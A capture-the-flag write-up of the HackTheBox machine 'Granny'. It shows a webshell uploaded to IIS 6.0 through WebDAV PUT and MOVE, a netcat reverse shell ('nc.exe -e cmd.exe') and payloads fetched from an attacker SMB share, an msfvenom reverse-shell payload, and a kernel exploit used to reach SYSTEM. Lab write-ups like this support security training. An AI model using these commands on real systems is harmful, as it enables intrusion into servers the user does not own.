An easy Windows box from HackTheBox, get initial acces by uploading a webshell, then get root by running a kernel exploit.

Recon

Running the regular nmap

sudo nmap -sC -sV -oA nmap/init 

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Sun, 18 Sep 2022 17:29:26 GMT
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

See that pretty much all HTTP methods work, including PUT, which might let us upload a webshell

Exploitation

First, need to find an aspx webshell, I like this one

Then open up Burpsuite, and intercept a refresh request on the website

And send the request to Repeater

Then create a PUT request to upload the webshell by copying the text and sending it as content

Need to change the request to PUT, and add a file name (here it’s shell.aspx)

Then send the request, however it doesn’t upload as it’s blocked by the server, showing a 403 Forbidden error

The workaround for this is to upload a .txt file, then use a MOVE request to change it to a .aspx file

Now, uploading the webshell as a .txt file

Then can see it on the server

Then using a MOVE http request to change it to a .aspx file, by changing the method to MOVE, and adding a destination “/shell.aspx”

Now have a reverse shell!

Now use SMB to run nc.exe and get a reverse shell

First, copying nc.exe to the current directory, then run impacket’s smbserver.py to host an smb server in the working directory

smbserver.py share .

Then set up a listener on port 4444

And on the webshell type

/c \\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444

And get a shell!

┌──(kali㉿kali)-[~/Documents/htb/granny]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.15] 1032
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.


c:\windows\system32\inetsrv> whoami
nt authority\network service

Then run systeminfo to collect hotfix and information about the system, and save it to a local file on Kali

c:\windows\system32\inetsrv> systeminfo

Host Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 1 Hours, 57 Minutes, 24 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 739 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,283 MB
Page File: In Use:         187 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

From here, just run Windows Exploit Suggester New Generation on the systeminfo text file, and find there are a lot of privilege escalation possibilities

I opted to use MS015-077, I uploaded the exe to the victim, and as well as a reverse shell executable ( made with msfvenom)

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f exe > rev.exe

Set up a reverse listener

rlwrap nc -lnvp 9001

And upload the executables using the smbserver script again

smbserver.py share .

Then on the victim, go to the TEMP directory and download them

c:\windows\TEMP> copy \\10.10.14.5\share\elevator.exe elevator.exe

c:\windows\TEMP> copy \\10.10.14.5\share\rev.exe rev.exe

And run the exploit

c:\windows\TEMP> elevator.exe rev.exe

Check back on the listener

listening on [any] 9001 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.15] 1037
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\Temp>whoami
nt authority\system

And have root!